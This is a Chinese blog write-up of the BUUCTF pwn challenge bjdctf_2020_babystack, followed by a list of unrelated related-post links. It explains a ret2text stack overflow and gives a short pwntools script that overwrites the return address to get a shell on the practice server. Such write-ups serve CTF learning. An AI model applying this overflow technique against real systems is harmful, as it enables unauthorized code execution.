【BUUCTF】bjdctf_2020_babystack Write Up
继续刷buuoj中…
看到上新题了,是当时比赛的时候做过的一道题,顺手打掉
程序只开了NX保护,读入字符数可控,直接ret2text解决
遇到的小问题是,本地环境打0x4006E6打不通,换成了0x4006EA,后来测试远程环境2个都可以,有点迷 =_=
from pwn import *
from LibcSearcher import *
from struct import packcontext.os='linux'
context.arch='amd64'
context.log_level='debug'sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)io=remote('node3.buuoj.cn',28201)
#io=process('./bjdctf_2020_babystack')
elf=ELF('./bjdctf_2020_babystack')ra()
sl('32')
ra()
sl('a'*24+p64(0x4006e6))io.interactive()
【BUUCTF】bjdctf_2020_babystack Write Up相关推荐
- 【buuctf】cscctf_2019_qual_babyheap
buuctf[cscctf_2019_qual_babyheap] 今天找了一道100分题目,题目本身并没有那么难 例行检查 64位的程序,保护机制全开,放到IDA中分析 漏洞分析 函数功能很简单,功 ...
- 【BUUCTF】Crypto题解
文章目录 MD5 一眼就解密 Url编码 看我回旋踢 摩丝 password 变异凯撒 Quoted-printable Rabbit 篱笆墙的影子 RSA Alice与Bob 丢失的MD5 RSA ...
- 【BUUCTF】梅花香之苦寒来
0x00 做了几天BUU的题,发现这个题有点儿意思,学了几个工具,顺便写个WP.(参考了这位大佬的WP: BUUCTF 梅花香自苦寒来) 0x01 下载下来一个压缩包,打开是一张图片,先解压,发现 ...
- 【BUUCTF】[Zer0pts2020]Can you guess it?
源码 <?php include 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i ...
- 【BUUCTF】强网杯 2019随便注1 write up
输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...
- 【BUUCTF】CTF_Crypto 密码学_Quoted-printable(引用可打印)
Quoted-printable_ 引用可打印 题目 密文:=E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=88=E6=A3=92=E5=93=A6 QP介绍 Quoted-Pri ...
- 【BUUCTF】[MRCTF2020]套娃
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧. 知识点 substr_count(),用空格或者.或者大写的url编码 preg_mach(),%0a绕过 本地 ...
- 【BUUCTF】[安洵杯 2019]吹着贝斯扫二维码
题目链接:[安洵杯 2019]吹着贝斯扫二维码. 下载压缩包解压得到这么一些文件,可以看到一堆未知类型文件和一个flag.zip 老规矩,把这些没有拓展名的文件用010Editor打开,发现都是jpg ...
- 【BUUCTF】[强网杯 2019]随便注 1
这是一个典型的sql注入题目 知识点: 1.注入点检测 2.万能匹配 3.暴力获得数据表和其属性 4.sql语句的掌握(order by; union select; rename table; al ...
最新文章
- 从GNOME切换到KDE了
- XP局域网访问无权限、不能互相访问问题的完整解决方案
- System.InvalidOperationException: The stream does not support reading
- 单片机编程主函数的特点
- Use Vim as a Python IDE
- Spring Boot————ApplicationListener实现逃课事件监听
- 计算机网络之应用层:4、电子邮件、SMTP、MIME、POP3
- 大数据学习笔记22:MR案例——双MR统计总利润并排序
- 从二叉树到完全二叉树
- 大数据分析的误区有哪些
- 所谓周末,就是在家好好做饭、好好睡觉、好好玩游戏
- java缓冲流和普通流的区别_关于java:数据输入/输出流和缓冲的输入/输出流有什么区别?...
- 世界名牌大学公开课集
- 腾讯云主机免费升级有感而发
- 1269: 爱看电视的LsF+遥控器 dfs+剪枝
- html多行注释如何实现,javascript多行注释如何实现
- WIN10 USB 代码19 无法识别USB
- C#NPOI操作EXCEL-设置密码及设置只读
- m_map包 绘制世界地图并投点(matlab)
- Leetcode52.Maximum Subarray(贪心与分治)
热门文章
- Android OpenCV使用4_双目摄像头双开两个预览界面,并获取当前帧图片
- 培训机构多如毛 国家重拳打压下为何不减反增?
- Presentify for Mac v4.1.5 实时屏幕注释工具
- geany配置python lint_Linux强大IDE——Geany配置说明
- 阿里云——学生成长计划领取资格考试
- 一个GIS研究生的自白
- 为Surface Neo和Surface Duo准备代码
- 公务员计算机基础知识考试,2017年计算机基础知识考试试题及答案「公务员」...
- 怎么利用计算机box恶搞别人,恶搞别人电脑,使他电脑自动关机....
- 青草游戏(2018爱奇艺校招)